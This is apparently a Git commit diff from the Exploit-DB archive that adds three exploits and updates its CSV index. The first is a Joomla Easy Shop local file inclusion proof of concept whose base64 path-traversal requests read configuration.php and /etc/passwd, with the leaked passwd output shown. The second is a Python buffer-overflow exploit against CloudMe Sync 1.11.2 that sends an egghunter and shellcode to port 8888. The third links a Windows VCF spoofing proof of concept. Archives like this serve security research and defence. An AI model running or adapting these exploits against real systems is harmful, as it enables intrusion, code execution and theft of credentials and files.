DB: 2019-01-23
3 changes to exploits/shellcodes CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution PHP Dashboards NEW 5.8 - Local File Inclusion PHP Uber-style GeoTracking 1.1 - SQL Injection Adianti Framework 5.5.0 - SQL Injection PHP Dashboards NEW 5.8 - Local File Inclusion PHP Uber-style GeoTracking 1.1 - SQL Injection Adianti Framework 5.5.0 - SQL Injection Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
This commit is contained in:
Offensive Security
parent
2ad3a5e94e
commit
9e738d6dae
4 changed files with 139 additions and 3 deletions
54
exploits/php/webapps/46219.txt
Normal file
54
exploits/php/webapps/46219.txt
Normal file
|
|
@ -0,0 +1,54 @@
|
|||
# Exploit Title: Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
|
||||
# Dork: N/A
|
||||
# Date: 2019-01-22
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://joomtech.net/
|
||||
# Software D.: https://www.joomtech.net/products/easyshop?task=file.download&key=7bafaa65995fb3b1383328105df1e10f
|
||||
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/shopping-cart/easy-shop/
|
||||
# Version: 1.2.3
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=[BASE64_FILE_NAME]
|
||||
#
|
||||
|
||||
GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA= HTTP/1.1
|
||||
GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Cookie: __cfduid=d11dd4447c0b8ef3cd8c4f6745ebdf50e1548111108; 6eecafb7a7a944789bd299deac1ff945=osde04ob1pgq9o3p8arfqtbobk
|
||||
DNT: 1
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 21 Jan 2019 23:58:02 GMT
|
||||
Content-Type: text/plain;charset=UTF-8
|
||||
Transfer-Encoding: chunked
|
||||
Connection: keep-alive
|
||||
Vary: Accept-Encoding
|
||||
Expect-CT: max-age=604800, report-uri="http://localhost/[PATH]/"
|
||||
Server: cloudflare
|
||||
CF-RAY: 49cd621bce8f537e-LAX
|
||||
Content-Encoding: br
|
||||
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
....
|
||||
58
exploits/windows/remote/46218.py
Executable file
58
exploits/windows/remote/46218.py
Executable file
|
|
@ -0,0 +1,58 @@
|
|||
#######################################################
|
||||
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow + Egghunt
|
||||
# Date: 23.04.2018
|
||||
# Exploit Author:T3jv1l
|
||||
# Vendor Homepage:https://www.cloudme.com/en
|
||||
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
|
||||
# Category:Local
|
||||
# Contact:https://twitter.com/T3jv1l
|
||||
# Version: CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt
|
||||
# Tested on: Windows 7 SP1 x86
|
||||
# CVE-2018-6892
|
||||
# Real exploit https://www.exploit-db.com/exploits/44027 in version 1.11.0
|
||||
# Hello subinacls and NytroRST !
|
||||
|
||||
#############################################################
|
||||
|
||||
import socket
|
||||
|
||||
egg = (
|
||||
"\x66\x81\xca\xff\x0f\x42\x52\x6a"
|
||||
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74" #boom
|
||||
"\xef\xb8\x62\x6f\x6f\x6d\x8b\xfa"
|
||||
"\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
|
||||
|
||||
target="127.0.0.1"
|
||||
junk="A"*1015
|
||||
jmp="\xd9\x37\x99\x69" #0x699937d9 push ret
|
||||
jump_back="\xeb\xc4" #jump -60 bytes
|
||||
|
||||
|
||||
#Shellcode calc.exe
|
||||
buf = ""
|
||||
buf +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
|
||||
buf +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
|
||||
buf +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
|
||||
buf +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
|
||||
buf +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
|
||||
buf +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
|
||||
buf +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
|
||||
buf +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
|
||||
buf +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
|
||||
buf +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
|
||||
buf +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
|
||||
buf +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
|
||||
buf +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
|
||||
buf +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
|
||||
buf +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
|
||||
buf +="\xc4\xd9"
|
||||
|
||||
payload1=junk+egg+"B"*5 + jmp + jump_back
|
||||
payload2="boomboom" + buf
|
||||
|
||||
try:
|
||||
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((target,8888))
|
||||
s.send(payload1+payload2)
|
||||
except:
|
||||
print "Don't Crash Me !"
|
||||
21
exploits/windows/remote/46220.txt
Normal file
21
exploits/windows/remote/46220.txt
Normal file
|
|
@ -0,0 +1,21 @@
|
|||
# Exploit Title: Microsoft Windows 'VCF' or 'Contact' File URL Manipulation-Spoof Arbitrary Code Execution Vulnerability -- Remote Vector
|
||||
|
||||
# Google Dork: N/A
|
||||
|
||||
# Date: January, 21 2019
|
||||
|
||||
# Exploit Author: Eduardo Braun Prado
|
||||
|
||||
# Vendor Homepage: http://www.microsoft.com/
|
||||
|
||||
# Software Link: http://www.microsoft.com/
|
||||
|
||||
# Version: Windows 7 SP1, 8.1, 10 v.1809 with full patches up to January 2019. both x86 and x64 architectures.
|
||||
|
||||
# Tested on: Windows 7 SP1, 8.1, 10 v.1809 with full patches up to January 2019. both x86 and x64 architectures.
|
||||
|
||||
# CVE : n/a
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46220.zip
|
||||
|
|
@ -17111,6 +17111,8 @@ id,file,description,date,author,type,platform,port
|
|||
46201,exploits/cgi/remote/46201.rb,"Webmin 1.900 - Remote Command Execution (Metasploit)",2019-01-18,AkkuS,remote,cgi,10000
|
||||
46193,exploits/multiple/remote/46193.py,"SCP Client - Multiple Vulnerabilities (SSHtranger Things)",2019-01-18,"Mark E. Haase",remote,multiple,
|
||||
46215,exploits/linux/remote/46215.rb,"GattLib 0.2 - Stack Buffer Overflow",2019-01-21,"Dhiraj Mishra",remote,linux,
|
||||
46218,exploits/windows/remote/46218.py,"CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt",2019-01-22,T3jv1l,remote,windows,8888
|
||||
46220,exploits/windows/remote/46220.txt,"Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution",2019-01-22,"Eduardo Braun Prado",remote,windows,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
|
@ -40692,6 +40694,7 @@ id,file,description,date,author,type,platform,port
|
|||
46210,exploits/php/webapps/46210.txt,"Reservic 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
|
||||
46211,exploits/php/webapps/46211.txt,"MoneyFlux 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
|
||||
46212,exploits/php/webapps/46212.txt,"PHP Dashboards NEW 5.8 - 'dashID' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
|
||||
46213,exploits/php/webapps/46213.txt,"PHP Dashboards NEW 5.8 - Local File Inclusion",2019-01-21,"Ihsan Sencan",webapps,php,
|
||||
46214,exploits/php/webapps/46214.txt,"PHP Uber-style GeoTracking 1.1 - SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,
|
||||
46217,exploits/php/webapps/46217.txt,"Adianti Framework 5.5.0 - SQL Injection",2019-01-21,"Joner de Mello Assolin",webapps,php,
|
||||
46213,exploits/php/webapps/46213.txt,"PHP Dashboards NEW 5.8 - Local File Inclusion",2019-01-21,"Ihsan Sencan",webapps,php,80
|
||||
46214,exploits/php/webapps/46214.txt,"PHP Uber-style GeoTracking 1.1 - SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80
|
||||
46217,exploits/php/webapps/46217.txt,"Adianti Framework 5.5.0 - SQL Injection",2019-01-21,"Joner de Mello Assolin",webapps,php,80
|
||||
46219,exploits/php/webapps/46219.txt,"Joomla! Component Easy Shop 1.2.3 - Local File Inclusion",2019-01-22,"Ihsan Sencan",webapps,php,80
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue